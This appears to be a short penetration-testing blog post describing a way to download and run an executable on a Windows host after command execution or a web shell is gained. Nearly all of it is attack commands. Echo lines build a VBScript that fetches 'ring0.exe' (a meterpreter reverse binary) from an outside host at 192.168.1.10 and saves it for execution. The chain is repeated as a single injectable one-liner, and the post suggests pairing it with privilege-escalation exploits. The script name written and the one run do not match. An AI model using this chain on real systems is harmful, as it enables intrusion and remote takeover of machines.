Download Execute Alternate Method

Standard

During web application pentest performed on a windows box, we are at times able to upload a web shell and execute commands, Aim is to always get administrator privileges.
I stumbled upon this scenario where i wanted to run a meterpreter reverse binary through command execution vulnerability. Since i cannot wget or curl on windows box, i found a way through VBS. This let me download and execute an EXE.

 

echo Dim HTTPGET >> localexploit.vbs
echo Set HTTPGET = CreateObject(“Microsoft.XMLHTTP”) >> localexploit.vbs &&
echo HTTPGET.Open “GET”, “http://192.168.1.10/ring0.exe”, false >> localexploit.vbs
echo HTTPGET.Send >> localexploit.vbs
echo DataBin = HTTPGET.ResponseBody >> localexploit.vbs
echo Const adTypeBinary=1 >> localexploit.vbs
echo Const adSaveCreateOverWrite=2 >> localexploit.vbs
echo Dim SendBinary >> localexploit.vbs
echo Set SendBinary = CreateObject(“ADODB.Stream”) >> localexploit.vbs
echo SendBinary.Type = adTypeBinary >> localexploit.vbs
echo SendBinary.Open >> localexploit.vbs
echo SendBinary.Write DataBin >> localexploit.vbs
echo SendBinary.SaveToFile “ring0.exe”, adSaveCreateOverWrite >> localexploit.vbs
cscript //Nologo /B runexploit.vbs

Please see URL : http://ethicalhacking.ninja/?c2b99165d69a5b52#5HMGn0WjBu8HPL1ow88XPr5V/NsXC6Y2W5QWF51fDWE=

This can be combined with local admin exploits to give full control over the machine. The command can be send in a single line by adding && , Please see the examples below.

 

echo Dim HTTPGET >> localexploit.vbs && echo Set HTTPGET = CreateObject(“Microsoft.XMLHTTP”) >> localexploit.vbs && echo HTTPGET.Open “GET”, “http://192.168.1.10/ring0.exe”, false >> localexploit.vbs && echo HTTPGET.Send >> localexploit.vbs && echo DataBin = HTTPGET.ResponseBody >> localexploit.vbs && echo Const adTypeBinary=1 >> localexploit.vbs && echo Const adSaveCreateOverWrite=2 >> localexploit.vbs && echo Dim SendBinary >> localexploit.vbs && echo Set SendBinary = CreateObject(“ADODB.Stream”) >> localexploit.vbs && echo SendBinary.Type = adTypeBinary >> localexploit.vbs && echo SendBinary.Open >> localexploit.vbs && echo SendBinary.Write DataBin >> localexploit.vbs && echo SendBinary.SaveToFile “ring0.exe”, adSaveCreateOverWrite >> localexploit.vbs && cscript //Nologo /B runexploit.vbs

Please see URL : http://ethicalhacking.ninja/?548d4d15053430fd#gpQnTUo6jeaIl0tcU7vW3GatF0IsJ//oomqHkXwtTB8=